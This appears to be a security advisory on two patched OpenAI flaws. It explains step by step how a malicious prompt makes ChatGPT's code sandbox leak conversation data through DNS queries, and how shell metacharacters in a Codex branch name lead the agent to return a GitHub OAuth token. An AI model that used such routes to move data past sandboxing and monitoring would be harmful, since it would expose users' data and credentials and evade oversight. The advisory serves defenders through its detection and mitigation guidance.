OpenAI Patches ChatGPT DNS Data Exfiltration Flaw and Codex Command Injection Vulnerability
Executive Summary
OpenAI has patched two distinct security vulnerabilities affecting its AI platforms. Check Point researchers discovered that ChatGPT’s code execution sandbox could leak conversation data, uploaded files, and sensitive content through a DNS side channel — bypassing OpenAI’s assumption that the container had no outbound network capability. Separately, BeyondTrust Phantom Labs identified a command injection vulnerability in OpenAI Codex’s repository task creation flow, where unsanitized branch name parameters allowed attackers to extract cleartext GitHub OAuth tokens. Both vulnerabilities have been remediated. Organizations using ChatGPT in workflows that handle sensitive data, and developers using Codex for code analysis, should review their exposure and rotate any credentials that may have been at risk.
Vulnerability 1: ChatGPT DNS Data Exfiltration
Discovery and Root Cause
Check Point researchers found that ChatGPT’s code execution environment — the sandbox container used for running code and analyzing data — was not as isolated as OpenAI believed. While OpenAI states that "the ChatGPT code execution environment is unable to generate outbound network requests directly," Check Point demonstrated this was not entirely correct.
The container could send DNS queries to external servers, creating a covert data exfiltration channel. As Check Point explained: "The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis."
The critical factor was a gap between security assumptions and reality: "Because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation."
How the Attack Works
The attack exploits the DNS resolution capability within the ChatGPT code sandbox:
Step 1 — Malicious Prompt: An attacker submits a prompt that instructs ChatGPT to execute code within its sandbox environment. The code is crafted to encode conversation data (messages, uploaded file contents, or other sensitive information) into DNS query strings.
Step 2 — DNS Side Channel: The sandbox container resolves the crafted domain name, transmitting the encoded data as part of the DNS query to an attacker-controlled DNS server. This works over standard UDP/TCP port 53 — a protocol that is almost universally permitted through firewalls and was not monitored by OpenAI’s data loss prevention controls.
Step 3 — Data Capture: The attacker’s DNS server logs the incoming queries, extracting the encoded data from the query payloads. The exfiltration is silent — no user-visible indication that data has left the conversation.
Check Point emphasized the severity: "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content."
Scope
- Affected: ChatGPT free and paid tiers — any user whose conversation triggered code execution
- Data at risk: Conversation history, uploaded files, code analysis results, any content processed in the sandbox
- Fixed: February 2026 (confirmed by The Register, published March 30, 2026)
Vulnerability 2: Codex Command Injection (GitHub Token Theft)
Discovery and Root Cause
BeyondTrust Phantom Labs identified a command injection vulnerability in OpenAI Codex’s cloud infrastructure. When users prompt Codex to analyze a repository, the platform sends an HTTP POST request containing an environment identifier and a branch name parameter. The backend system failed to sanitize this parameter for shell metacharacters.
As Technadu reported: "Because the backend system lacked adequate input sanitization, threat actors could embed shell metacharacters directly into the branch designation."
How the Attack Works
Step 1 — Crafted Branch Name: An attacker creates a repository analysis task in Codex, providing a branch name that contains shell injection characters (e.g., semicolons, pipes, or backticks).
Step 2 — Command Execution: The Codex backend concatenates the branch name into a shell command without escaping. The injected commands execute within the Codex container with the privileges of the service process.
Step 3 — Token Extraction: The attacker’s injected commands write the Git remote URL and embedded OAuth token to a file within the container, then prompt the Codex agent to read and return the file’s contents.
Step 4 — Exfiltration: Codex returns the cleartext GitHub OAuth token to the attacker through the normal response channel. No external C2 infrastructure is required — the AI agent itself becomes the exfiltration mechanism.
Scope
- Affected applications: Codex cloud interface, Codex CLI, SDKs (Python, JavaScript/TypeScript, Java, Go, Ruby), and IDE integrations
- Data at risk: GitHub OAuth tokens (access, refresh, and ID tokens), OpenAI API keys, and associated account identifiers
- Impact amplification: A malicious branch name in a shared organizational repository could compromise every developer who analyzes it with Codex
- Fixed: OpenAI has fully remediated the vulnerability across all affected applications following responsible disclosure
Impact Assessment
ChatGPT DNS Flaw
The DNS exfiltration vulnerability is particularly concerning because it exploits a fundamental gap in OpenAI’s security model. The container was assumed to have no outbound data capability, so no DLP controls monitored the DNS channel. Any organization that uses ChatGPT for analyzing sensitive documents, code, or internal data should assume that content processed during the vulnerability window may have been exposed.
Codex Command Injection
The Codex vulnerability represents a new class of AI agent security risk. The attack requires no malware, no network exploitation, and no privilege escalation — just a carefully crafted input parameter. The AI agent itself performs the exfiltration, making it difficult to distinguish from legitimate behavior. As Technadu noted, "adversaries could automate and scale this attack to target multiple developers" through poisoned repositories.
Combined Implications
Together, these vulnerabilities demonstrate that AI platforms introduce novel attack surfaces that don’t map cleanly to traditional vulnerability categories. DNS side channels in sandboxed environments and command injection through natural-language task parameters represent risks that security teams may not be monitoring for.
Detection & Response
For ChatGPT DNS Exfiltration
| Detection Method | Details |
|---|---|
| DNS query monitoring | Look for unusually large DNS query payloads, base64-encoded subdomains, or high-frequency queries to unfamiliar domains originating from AI-integrated systems |
| Network segmentation audit | Verify that AI sandbox environments cannot perform DNS resolution to arbitrary external servers |
| DLP policy review | Ensure data loss prevention controls cover DNS channels, not just HTTP/HTTPS |
For Codex Command Injection
| Detection Method | Details |
|---|---|
| GitHub token audit | Review GitHub OAuth token activity for unusual repository access patterns correlated with Codex usage |
| Credential rotation | Rotate all GitHub tokens and OpenAI API keys for developers who used Codex during the vulnerability window |
| Repository branch name review | Audit shared repositories for branch names containing shell metacharacters |
Mitigation & Remediation
| Priority | Action | Details |
|---|---|---|
| Critical | Rotate credentials | Rotate GitHub OAuth tokens, OpenAI API keys, and any credentials that may have been accessible from Codex or ChatGPT sandbox environments |
| Critical | Update AI services | Ensure all Codex applications (CLI, SDK, IDE integrations) are updated to patched versions |
| High | Restrict AI plugin access | Disable ChatGPT “Actions” and Codex integrations for sensitive repositories until your security team has reviewed the access model |
| High | Enforce human-in-the-loop | Require manual approval for AI-initiated outbound data transfers, especially in workflows that process sensitive content |
| Medium | Harden sandbox networking | If running self-hosted AI environments, restrict DNS resolution from sandbox containers to internal resolvers only |
| Medium | Monitor DNS traffic | Deploy DNS monitoring that flags anomalous query patterns — high entropy subdomains, large payloads, or rapid sequential queries to new domains |
| Medium | Input validation for AI agents | If building on Codex or similar AI coding agents, sanitize all user-supplied parameters before passing them to shell commands |
Timeline
| Date | Event |
|---|---|
| February 2026 | Check Point researchers discover the ChatGPT DNS data exfiltration vulnerability |
| February 2026 | OpenAI patches the ChatGPT DNS flaw |
| March 30, 2026 | Check Point publishes research; The Register, The Hacker News, and Technadu report on both vulnerabilities |
| March 30, 2026 | BeyondTrust Phantom Labs’ Codex command injection research published; OpenAI confirms full remediation |
Sources & References
- The Hacker News. OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability. Link
- Technadu. OpenAI Codex Command Injection Flaw Exposes GitHub Tokens. Link
- The Register. OpenAI ChatGPT Fixes DNS Data Smuggling Flaw. Link